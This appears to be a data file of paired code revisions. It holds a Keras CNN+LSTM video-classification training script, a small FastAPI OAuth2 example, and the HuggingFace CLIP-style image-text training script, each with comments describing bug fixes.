        print(f'Video label = {label}')
        features_path = f'{features_dir}/{label}/{video_name}.npy'
        X, _ = frames.generate(video)
        print(f'X shape = {X.shape}')
        features = base_model.predict(X)
        print(f'features shape = {features.shape}')
        # exist_ok avoids the check-then-create race of the original code.
        os.makedirs(f'{features_dir}/{label}', exist_ok=True)
        np.save(features_path, features)
def extract_cnn_features_all(raw_data_dir, features_dir):
    """Extract one InceptionV3 'avg_pool' feature vector per frame for every video.

    Walks <raw_data_dir>/<sign>/<video>/*.jpg and writes the stacked per-frame
    features to <features_dir>/<sign>/<video>.npy.

    Args:
        raw_data_dir: root directory, one sub-directory per sign, each holding
            one sub-directory of .jpg frames per video.
        features_dir: output root mirroring the <sign>/<video> layout.
    """
    # Use the penultimate ('avg_pool') layer of InceptionV3 as a fixed feature extractor.
    model = InceptionV3(weights='imagenet', include_top=True)
    base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
    _, height, width, channels = base_model.input_shape
    print(base_model.input_shape)
    signs = sorted(name for name in os.listdir(raw_data_dir) if os.path.isdir(os.path.join(raw_data_dir, name)))
    for sign in signs:
        print("\nSign = {0}\n-------------------".format(sign))
        videos = sorted(name for name in os.listdir(os.path.join(raw_data_dir, sign))
                        if os.path.isdir(os.path.join(raw_data_dir, sign, name)))
        # For each video we save the CNN features computed on each frame image.
        for video in videos:
            print("Video = {0}".format(video))
            features_path = f'{features_dir}/{sign}/{video}.npy'
            # exist_ok avoids the check-then-create race of the original code.
            os.makedirs(f'{features_dir}/{sign}', exist_ok=True)
            pathname = os.path.join(raw_data_dir, sign, video, '*.jpg')
            imagenames = sorted(glob.glob(pathname))
            if not imagenames:
                # np.vstack([]) raises ValueError; skip frame-less videos instead of crashing.
                print(f'WARNING: no .jpg frames found for {sign}/{video}, skipping')
                continue
            features_list = []
            for imagename in imagenames:
                img = image.load_img(imagename, target_size=(height, width))
                img_data = image.img_to_array(img)
                img_data = np.expand_dims(img_data, axis=0)
                img_data = preprocess_input(img_data)
                features_list.append(base_model.predict(img_data))
            np.save(features_path, np.vstack(features_list))
            print("{0} images processed\n".format(len(features_list)))
def train_lstm(features_path, epochs, num_features, num_classess, batch_size=32):
    """Train a two-layer LSTM classifier on pre-extracted CNN feature sequences.

    Args:
        features_path: root containing 'train' and 'test' feature directories.
        epochs: number of training epochs.
        num_features: dimensionality of each per-frame feature vector.
        num_classess: number of output classes.
        batch_size: mini-batch size. Replaces the module-level BATCH_SIZE
            constant, which is commented out above and made the original raise
            NameError at runtime.

    Returns:
        The trained Keras model.
    """
    model = Sequential()
    model.add(LSTM(num_features, dropout=0.2, input_shape=(20, num_features), return_sequences=True))
    model.add(LSTM(num_features * 1, return_sequences=False))
    model.add(Dense(num_classess, activation='softmax'))
    optimizer = Adam(lr=1e-4)
    model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
    # Keep only the best checkpoint (lowest validation loss) on disk.
    callbacks = [ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
    train_features = FeaturesSeqGenerator(features_path + '/train', batch_size, model.input_shape[1:])
    val_features = FeaturesSeqGenerator(features_path + '/test', batch_size, model.input_shape[1:])
    model.fit_generator(generator=train_features,
                        validation_data=val_features,
                        epochs=int(epochs),
                        workers=1,
                        use_multiprocessing=False,
                        verbose=1,
                        callbacks=callbacks)
    return model
def train_lstm_jittered(features_path, sequencelength, epochs, num_features, num_classess):
    """Train an LSTM classifier on jittered (randomly sampled) feature sequences.

    Fixes the original bug where the `features_path` argument was ignored and
    both data generators always read from the hard-coded 'cnn_features'
    directory.

    Args:
        features_path: root containing 'train' and 'test' feature directories.
        sequencelength: number of timesteps sampled per sequence.
        epochs: number of training epochs.
        num_features: dimensionality of each per-frame feature vector.
        num_classess: number of output classes.

    Returns:
        The trained Keras model.
    """
    model = Sequential()
    model.add(LSTM(2048, return_sequences=False, input_shape=(sequencelength, num_features), dropout=0.5))
    model.add(Dense(512, activation='relu'))
    model.add(Dropout(0.5))
    model.add(Dense(num_classess, activation='softmax'))
    optimizer = Adam(lr=1e-4)
    model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    callbacks = [ModelCheckpoint('video_LSTM.h5', monitor='val_loss', save_best_only=True, verbose=1)]
    # Shuffle and use a larger batch for training; validate deterministically.
    train_gen = DataGenerator(f'{features_path}/train',
                              batch_size=32,
                              featureLength=2048,
                              seqLength=sequencelength,
                              shuffle=True)
    val_gen = DataGenerator(f'{features_path}/test',
                            batch_size=16,
                            featureLength=2048,
                            seqLength=sequencelength,
                            shuffle=False)
    model.fit_generator(generator=train_gen,
                        validation_data=val_gen,
                        epochs=int(epochs),
                        workers=1,
                        use_multiprocessing=False,
                        verbose=1,
                        callbacks=callbacks)
    return model
if __name__ == '__main__':
    # CLI entry point: parse options, then train the jittered LSTM on
    # CNN features that were extracted beforehand into --features-path.
    cli = argparse.ArgumentParser(description='Train CNN+LSTM model for short video snippets')
    cli.add_argument('--data-path', default='processed_data', required=False, help='path to the train and test directories')
    cli.add_argument('--lstm-epochs', default=100, required=False, help='number of LSTM epochs')
    cli.add_argument('--reload-cnn-features', default=True, required=False, help='re-extract CNN features from frames')
    cli.add_argument('--features-path', default='cnn_features', required=False, help='extracted CNN features path')
    args = vars(cli.parse_args())
    print(args)
    if args.get('data_path') is None:
        print('Please provide path to video frames')
        exit()
    # Feature extraction (extract_cnn_features / extract_cnn_features_all) is
    # assumed to have been run already; only the LSTM is trained here.
    num_features = 2048
    # One class per sub-directory of the training features.
    num_classes = len(os.listdir(f'{args["features_path"]}/train'))
    seqLength = 10
    model = train_lstm_jittered(args['features_path'], seqLength, args['lstm_epochs'], num_features, num_classes)
|
from fastapi import Depends, FastAPI
from fastapi.security import OAuth2PasswordBearer
import os
# Application instance served by uvicorn (see the __main__ block below).
app = FastAPI()
# OAuth2 password-flow scheme; clients send "Authorization: Bearer <token>"
# and obtain tokens from the relative "token" endpoint.
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
@app.get("/items/")
async def read_items(token: str = Depends(oauth2_scheme)):
    """Echo the bearer token extracted by the OAuth2 dependency."""
    return {"token": token}
if __name__ == '__main__':
    print(f'INFO: Starting the FASTAPI server...')
    print(f'INFO: DOCS on: http://127.0.0.1:11111/docs')
    # Derive the module name with os.path instead of splitting on '/' — the
    # original broke on Windows paths and nested same-kind quotes inside the
    # f-string, which is a SyntaxError on Python versions before 3.12.
    module_name = os.path.splitext(os.path.basename(__file__))[0]
    os.system(f"uvicorn {module_name}:app --host 127.0.0.1 --port 11111")
| from fastapi import Depends, FastAPI
from fastapi.security import OAuth2PasswordBearer
import os
# Application instance served by uvicorn (see the __main__ block below).
app = FastAPI()
# OAuth2 password-flow scheme; clients send "Authorization: Bearer <token>"
# and obtain tokens from the relative "token" endpoint.
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
@app.get("/items/")
async def read_items(token: str = Depends(oauth2_scheme)):
    """Echo the bearer token extracted by the OAuth2 dependency."""
    return {"token": token}
if __name__ == '__main__':
    print(f'INFO: Starting the FASTAPI server...')
    print(f'INFO: DOCS on: http://127.0.0.1:11111/docs')
    # Derive the module name with os.path instead of splitting on '/', which
    # fails on Windows path separators.
    module_name = os.path.splitext(os.path.basename(__file__))[0]
    os.system(f"uvicorn {module_name}:app --host 127.0.0.1 --port 11111")
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Training a CLIP like dual encoder models using text and vision encoders in the library.
The script can be used to train CLIP like models for languages other than English by using
a text encoder pre-trained in the desired language. Currently this script supports the following vision
and text models:
Vision models: ViT(https://huggingface.co/models?filter=vit), CLIP (https://huggingface.co/models?filter=clip)
Text models: BERT, ROBERTa (https://huggingface.co/models?filter=fill-mask)
"""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import torch
from datasets import load_dataset
from PIL import Image
from torchvision.io import ImageReadMode, read_image
from torchvision.transforms import CenterCrop, ConvertImageDtype, Normalize, Resize
from torchvision.transforms.functional import InterpolationMode
import transformers
from transformers import (
AutoFeatureExtractor,
AutoModel,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Module-level logger; its level/handlers are configured inside main().
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.18.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/contrastive-image-text/requirements.txt")
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
    """
    # Required: checkpoint to start from (local path or hub model id).
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
    cache_dir: Optional[str] = field(
        default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
    # Freezing either tower trains only the other side (and the projection),
    # i.e. linear-probe-style training for the frozen encoder.
    freeze_vision_model: bool = field(
        default=False, metadata={"help": "Whether to freeze the vision model parameters or not."}
    )
    freeze_text_model: bool = field(
        default=False, metadata={"help": "Whether to freeze the text model parameters or not."}
    )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.
    """
    dataset_name: Optional[str] = field(
        default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    data_dir: Optional[str] = field(default=None, metadata={"help": "The data directory containing input files."})
    image_column: Optional[str] = field(
        default="image_path",
        metadata={"help": "The name of the column in the datasets containing the full image file paths."},
    )
    caption_column: Optional[str] = field(
        default="caption",
        metadata={"help": "The name of the column in the datasets containing the image captions."},
    )
    train_file: Optional[str] = field(
        default=None, metadata={"help": "The input training data file (a jsonlines file)."}
    )
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file (a jsonlines file)."},
    )
    # Restored: main() reads data_args.test_file, which raised AttributeError
    # because this field was missing from the dataclass.
    test_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input testing data file (a jsonlines file)."},
    )
    max_seq_length: Optional[int] = field(
        default=128,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of training examples to this "
            "value if set."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )
    # Defined exactly once (the original declared this field twice in a row).
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )

    def __post_init__(self):
        # Validate that some data source was given and that file extensions are
        # supported. The original contained a second, contradictory check that
        # restricted validation_file to json right after asserting csv-or-json;
        # csv validation files are supported by load_dataset in main().
        if self.dataset_name is None and self.train_file is None and self.validation_file is None:
            raise ValueError("Need either a dataset name or a training/validation file.")
        else:
            if self.train_file is not None:
                extension = self.train_file.split(".")[-1]
                assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
            if self.validation_file is not None:
                extension = self.validation_file.split(".")[-1]
                assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
# Maps a dataset builder script name -> (image column, caption column) defaults
# used in main() when --image_column/--caption_column are not given.
dataset_name_mapping = {
    "image_caption_dataset.py": ("image_path", "caption"),
}
# We use torchvision for faster image pre-processing. The transforms are implemented as nn.Module,
# so we jit it to be faster.
class Transform(torch.nn.Module):
    """Image preprocessing pipeline: resize, center-crop, float-convert, normalize."""
    def __init__(self, image_size, mean, std):
        super().__init__()
        # Sequential module so the whole pipeline can be torch.jit.script-ed.
        self.transforms = torch.nn.Sequential(
            Resize([image_size], interpolation=InterpolationMode.BICUBIC),
            CenterCrop(image_size),
            ConvertImageDtype(torch.float),
            Normalize(mean, std),
        )
    def forward(self, x: Image) -> torch.Tensor:
        # Pure preprocessing — gradients are never needed here.
        with torch.no_grad():
            x = self.transforms(x)
        return x
def collate_fn(examples):
    """Collate per-example dicts into a model-ready batch.

    Stacks the image tensors and converts the token-id / mask lists to long
    tensors; `return_loss=True` asks the CLIP-style model to compute the
    contrastive loss.
    """
    batch = {
        "pixel_values": torch.stack([ex["pixel_values"] for ex in examples]),
        "input_ids": torch.tensor([ex["input_ids"] for ex in examples], dtype=torch.long),
        "attention_mask": torch.tensor([ex["attention_mask"] for ex in examples], dtype=torch.long),
        "return_loss": True,
    }
    return batch
def main():
    """Fine-tune a CLIP-style dual encoder on an image/caption dataset."""
    # 1. Parse input arguments
    # See all possible arguments in src/transformers/training_args.py
    # or by passing the --help flag to this script.
    # We now keep distinct sets of args, for a cleaner separation of concerns.
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
    else:
        model_args, data_args, training_args = parser.parse_args_into_dataclasses()
    # 2. Setup logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        handlers=[logging.StreamHandler(sys.stdout)],
    )
    log_level = training_args.get_process_log_level()
    logger.setLevel(log_level)
    transformers.utils.logging.set_verbosity(log_level)
    transformers.utils.logging.enable_default_handler()
    transformers.utils.logging.enable_explicit_format()
    # Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
        + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
    logger.info(f"Training/evaluation parameters {training_args}")
    # 3. Detecting last checkpoint and eventually continue from last checkpoint
    last_checkpoint = None
    if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
        last_checkpoint = get_last_checkpoint(training_args.output_dir)
        if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
            raise ValueError(
                f"Output directory ({training_args.output_dir}) already exists and is not empty. "
                "Use --overwrite_output_dir to overcome."
            )
        elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
            logger.info(
                f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
                "the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
            )
    # 4. Load dataset
    # Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
    # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
    # (the dataset will be downloaded automatically from the datasets Hub).
    #
    # For CSV/JSON files this script will use the first column for the full image path and the second column for the
    # captions (unless you specify column names for this with the `image_column` and `caption_column` arguments).
    #
    if data_args.dataset_name is not None:
        # Downloading and loading a dataset from the hub.
        dataset = load_dataset(
            data_args.dataset_name,
            data_args.dataset_config_name,
            cache_dir=model_args.cache_dir,
            keep_in_memory=False,
            data_dir=data_args.data_dir,
        )
    else:
        data_files = {}
        if data_args.train_file is not None:
            data_files["train"] = data_args.train_file
            extension = data_args.train_file.split(".")[-1]
        if data_args.validation_file is not None:
            data_files["validation"] = data_args.validation_file
            extension = data_args.validation_file.split(".")[-1]
        if data_args.test_file is not None:
            data_files["test"] = data_args.test_file
            extension = data_args.test_file.split(".")[-1]
        dataset = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
    # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
    # https://huggingface.co/docs/datasets/loading_datasets.html.
    # 5. Load pretrained model, tokenizer, and feature extractor
    if model_args.tokenizer_name:
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.tokenizer_name, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
        )
    elif model_args.model_name_or_path:
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.model_name_or_path, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
        )
    else:
        raise ValueError(
            "You are instantiating a new tokenizer from scratch. This is not supported by this script."
            "You can do it from another script, save it, and load it from here, using --tokenizer_name."
        )
    # Load feature_extractor, in this script we only use this to get the mean and std for normalization.
    feature_extractor = AutoFeatureExtractor.from_pretrained(
        model_args.feature_extractor_name or model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    model = AutoModel.from_pretrained(
        model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    config = model.config
    def _freeze_params(module):
        # Freeze every parameter of the given sub-module.
        for param in module.parameters():
            param.requires_grad = False
    if model_args.freeze_vision_model:
        _freeze_params(model.vision_model)
    if model_args.freeze_text_model:
        _freeze_params(model.text_model)
    # set seed for torch dataloaders
    set_seed(training_args.seed)
    # Preprocessing the datasets.
    # We need to tokenize inputs and targets.
    if training_args.do_train:
        column_names = dataset["train"].column_names
    elif training_args.do_eval:
        column_names = dataset["validation"].column_names
    elif training_args.do_predict:
        column_names = dataset["test"].column_names
    else:
        logger.info("There is nothing to do. Please pass `do_train`, `do_eval` and/or `do_predict`.")
        return
    # 6. Get the column names for input/target.
    dataset_columns = dataset_name_mapping.get(data_args.dataset_name, None)
    if data_args.image_column is None:
        image_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
    else:
        image_column = data_args.image_column
        if image_column not in column_names:
            # NOTE: the original f-string here had unbalanced quotes and was a SyntaxError.
            raise ValueError(
                f"--image_column' value '{data_args.image_column}' needs to be one of: {', '.join(column_names)}"
            )
    if data_args.caption_column is None:
        caption_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
    else:
        caption_column = data_args.caption_column
        if caption_column not in column_names:
            # NOTE: the original f-string here had unbalanced quotes and was a SyntaxError.
            raise ValueError(
                f"--caption_column' value '{data_args.caption_column}' needs to be one of: {', '.join(column_names)}"
            )
    # 7. Preprocessing the datasets.
    # Initialize torchvision transforms and jit it for faster processing.
    image_transformations = Transform(
        config.vision_config.image_size, feature_extractor.image_mean, feature_extractor.image_std
    )
    image_transformations = torch.jit.script(image_transformations)
    # Preprocessing the datasets.
    # We need to tokenize input captions and transform the images.
    def tokenize_captions(examples):
        # Batched map: pad/truncate all captions to max_seq_length.
        captions = [caption for caption in examples[caption_column]]
        text_inputs = tokenizer(captions, max_length=data_args.max_seq_length, padding="max_length", truncation=True)
        examples["input_ids"] = text_inputs.input_ids
        examples["attention_mask"] = text_inputs.attention_mask
        return examples
    def transform_images(examples):
        # Applied lazily via set_transform so images are decoded on the fly.
        images = [read_image(image_file, mode=ImageReadMode.RGB) for image_file in examples[image_column]]
        examples["pixel_values"] = [image_transformations(image) for image in images]
        return examples
    def filter_corrupt_images(examples):
        """remove problematic images"""
        valid_images = []
        for image_file in examples[image_column]:
            try:
                Image.open(image_file)
                valid_images.append(True)
            except Exception:
                valid_images.append(False)
        return valid_images
    if training_args.do_train:
        if "train" not in dataset:
            raise ValueError("--do_train requires a train dataset")
        train_dataset = dataset["train"]
        if data_args.max_train_samples is not None:
            max_train_samples = min(len(train_dataset), data_args.max_train_samples)
            train_dataset = train_dataset.select(range(max_train_samples))
        train_dataset = train_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        train_dataset = train_dataset.map(
            function=tokenize_captions,
            batched=True,
            remove_columns=[col for col in column_names if col != image_column],
            num_proc=data_args.preprocessing_num_workers,
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on train dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        train_dataset.set_transform(transform_images)
    if training_args.do_eval:
        if "validation" not in dataset:
            raise ValueError("--do_eval requires a validation dataset")
        eval_dataset = dataset["validation"]
        if data_args.max_eval_samples is not None:
            max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
            eval_dataset = eval_dataset.select(range(max_eval_samples))
        eval_dataset = eval_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        eval_dataset = eval_dataset.map(
            function=tokenize_captions,
            batched=True,
            num_proc=data_args.preprocessing_num_workers,
            remove_columns=[col for col in column_names if col != image_column],
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on validation dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        eval_dataset.set_transform(transform_images)
    if training_args.do_predict:
        if "test" not in dataset:
            raise ValueError("--do_predict requires a test dataset")
        test_dataset = dataset["test"]
        if data_args.max_eval_samples is not None:
            max_eval_samples = min(len(test_dataset), data_args.max_eval_samples)
            test_dataset = test_dataset.select(range(max_eval_samples))
        test_dataset = test_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        test_dataset = test_dataset.map(
            function=tokenize_captions,
            batched=True,
            num_proc=data_args.preprocessing_num_workers,
            remove_columns=[col for col in column_names if col != image_column],
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on test dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        test_dataset.set_transform(transform_images)
    # 8. Initalize our trainer
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=train_dataset if training_args.do_train else None,
        eval_dataset=eval_dataset if training_args.do_eval else None,
        data_collator=collate_fn,
    )
    # 9. Training
    if training_args.do_train:
        checkpoint = None
        if training_args.resume_from_checkpoint is not None:
            checkpoint = training_args.resume_from_checkpoint
        elif last_checkpoint is not None:
            checkpoint = last_checkpoint
        train_result = trainer.train(resume_from_checkpoint=checkpoint)
        trainer.save_model()
        trainer.log_metrics("train", train_result.metrics)
        trainer.save_metrics("train", train_result.metrics)
        trainer.save_state()
    # 10. Evaluation
    if training_args.do_eval:
        metrics = trainer.evaluate()
        trainer.log_metrics("eval", metrics)
        trainer.save_metrics("eval", metrics)
    # 11. Write Training Stats and push to hub.
    kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "contrastive-image-text-modeling"}
    if data_args.dataset_name is not None:
        kwargs["dataset_tags"] = data_args.dataset_name
        if data_args.dataset_config_name is not None:
            kwargs["dataset_args"] = data_args.dataset_config_name
            kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
        else:
            kwargs["dataset"] = data_args.dataset_name
    if training_args.push_to_hub:
        trainer.push_to_hub(**kwargs)
    else:
        trainer.create_model_card(**kwargs)
| #!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Training a CLIP like dual encoder models using text and vision encoders in the library.
The script can be used to train CLIP like models for languages other than English by using
a text encoder pre-trained in the desired language. Currently this script supports the following vision
and text models:
Vision models: ViT(https://huggingface.co/models?filter=vit), CLIP (https://huggingface.co/models?filter=clip)
Text models: BERT, ROBERTa (https://huggingface.co/models?filter=fill-mask)
"""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import torch
from datasets import load_dataset
from PIL import Image
from torchvision.io import ImageReadMode, read_image
from torchvision.transforms import CenterCrop, ConvertImageDtype, Normalize, Resize
from torchvision.transforms.functional import InterpolationMode
import transformers
from transformers import (
AutoFeatureExtractor,
AutoModel,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.18.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/contrastive-image-text/requirements.txt")
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.

    Parsed by HfArgumentParser in main(): every field becomes a CLI flag and its
    metadata["help"] string becomes that flag's help text.
    """
    # Required (no default): the only mandatory model argument.
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
    cache_dir: Optional[str] = field(
        default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
    # Freeze flags: main() sets requires_grad=False on the corresponding sub-model.
    freeze_vision_model: bool = field(
        default=False, metadata={"help": "Whether to freeze the vision model parameters or not."}
    )
    freeze_text_model: bool = field(
        default=False, metadata={"help": "Whether to freeze the text model parameters or not."}
    )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.

    Parsed by HfArgumentParser in main(). Fixes relative to the previous version:
    the duplicated ``overwrite_cache`` field declaration was removed, the two
    contradictory ``validation_file`` extension checks in ``__post_init__`` were
    consolidated (their combined effect only ever accepted json), and a
    ``test_file`` field was added because main() reads ``data_args.test_file``
    when building ``data_files``. ``test_file`` is appended after all existing
    fields so the generated ``__init__`` stays positionally backward-compatible.
    """
    dataset_name: Optional[str] = field(
        default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    data_dir: Optional[str] = field(default=None, metadata={"help": "The data directory containing input files."})
    image_column: Optional[str] = field(
        default="image_path",
        metadata={"help": "The name of the column in the datasets containing the full image file paths."},
    )
    caption_column: Optional[str] = field(
        default="caption",
        metadata={"help": "The name of the column in the datasets containing the image captions."},
    )
    train_file: Optional[str] = field(
        default=None, metadata={"help": "The input training data file (a jsonlines file)."}
    )
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file (a jsonlines file)."},
    )
    max_seq_length: Optional[int] = field(
        default=128,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of training examples to this "
            "value if set."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    # New, defaulted field appended last: referenced by main() when do_predict is
    # used with local data files.
    test_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input test data file (a jsonlines file)."},
    )

    def __post_init__(self):
        # Either a hub dataset name or at least one local data file is required.
        if self.dataset_name is None and self.train_file is None and self.validation_file is None:
            raise ValueError("Need either a dataset name or a training/validation file.")
        else:
            if self.train_file is not None:
                extension = self.train_file.split(".")[-1]
                assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
            if self.validation_file is not None:
                # The previous pair of asserts ("csv or json" followed by "json
                # only") net-accepted json only; keep that effective behavior.
                extension = self.validation_file.split(".")[-1]
                assert extension == "json", "`validation_file` should be a json file."
# Fallback (image column, caption column) names per known dataset loading
# script; main() consults this via .get(data_args.dataset_name) when the
# --image_column / --caption_column arguments are None.
dataset_name_mapping = {
    "image_caption_dataset.py": ("image_path", "caption"),
}
# We use torchvision for faster image pre-processing. The transforms are implemented as nn.Module,
# so we jit it to be faster.
